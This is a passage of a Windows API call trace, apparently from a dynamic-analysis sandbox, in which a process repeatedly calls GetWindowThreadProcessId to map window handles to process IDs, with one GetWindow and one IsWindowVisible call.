	[0399.429] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.429] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1398
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1358
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1370
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1340
	[0399.430] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x130c
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x12c0
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x12e4
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1270
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1298
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x120c
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x122c
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x11c4
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x11b0
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1188
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1148
	[0399.431] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1160
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x10fc
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe34
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xea4
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x514
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe48
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xbc8
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xdf8
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x318
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xcac
	[0399.432] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x8bc
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf9c
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf48
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe40
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xecc
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xeb8
	[0399.433] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe80
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe98
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe60
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xee4
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf00
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xdf0
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe1c
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xdd0
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd94
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd74
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd00
	[0399.434] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xcd8
	[0399.435] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc84
	[0399.435] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xca4
	[0399.435] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc64
	[0399.435] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc24
	[0399.436] GetWindow (hWnd=0x10344, uCmd=0x4) returned 0x0
	[0399.437] IsWindowVisible (hWnd=0x10344) returned 0
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb84
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xbac
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x384
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xab8
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x33c
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa44
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa64
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x8a8
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xaf0
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x88c
	[0399.437] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb04
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x910
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x230
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xac0
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xab4
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xaac
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x3d0
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x978
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa7c
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x59c
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa88
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa6c
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa68
	[0399.438] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x9f8
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xa04
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x924
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x8dc
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7dc
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x768
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x764
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x820
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x810
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x794
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x83c
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7ac
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb44
	[0399.439] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb5c
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x838
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x818
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x5b8
	[0399.440] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x494
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1ec
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x440
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x7e8
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x730
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x2c8
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x31c
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x330
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x128
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x5c8
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x6f8
	[0399.441] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x358
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x73c
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xb0
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x250
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x240
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x790
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x61c
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x540
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x538
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x568
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x538
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x568
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x538
	[0399.442] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x540
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x540
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x57c
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x554
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x528
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.443] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x79c
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4e0
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x44c
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x778
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x460
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x558
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x4d0
	[0399.444] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc94
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x13b0
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x13ac
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x13a8
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1374
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x132c
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1328
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x12d0
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x12cc
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x12c8
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1290
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1218
	[0399.445] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1214
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x11ec
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x11e8
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x11cc
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x1140
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe6c
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0x6e8
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc6c
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf94
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xffc
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf74
	[0399.446] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf08
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf0c
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xed8
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xe90
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xea8
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfa8
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfbc
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfb8
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfb4
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfb0
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfac
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfc0
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xfd0
	[0399.447] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf88
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf84
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xf80
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xde0
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xddc
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xdd8
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd34
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd10
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xd0c
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc9c
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc74
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc1c
	[0399.448] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xc08
	[0399.449] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x18de00 | out: lpdwProcessId=0x18de00) returned 0xabc
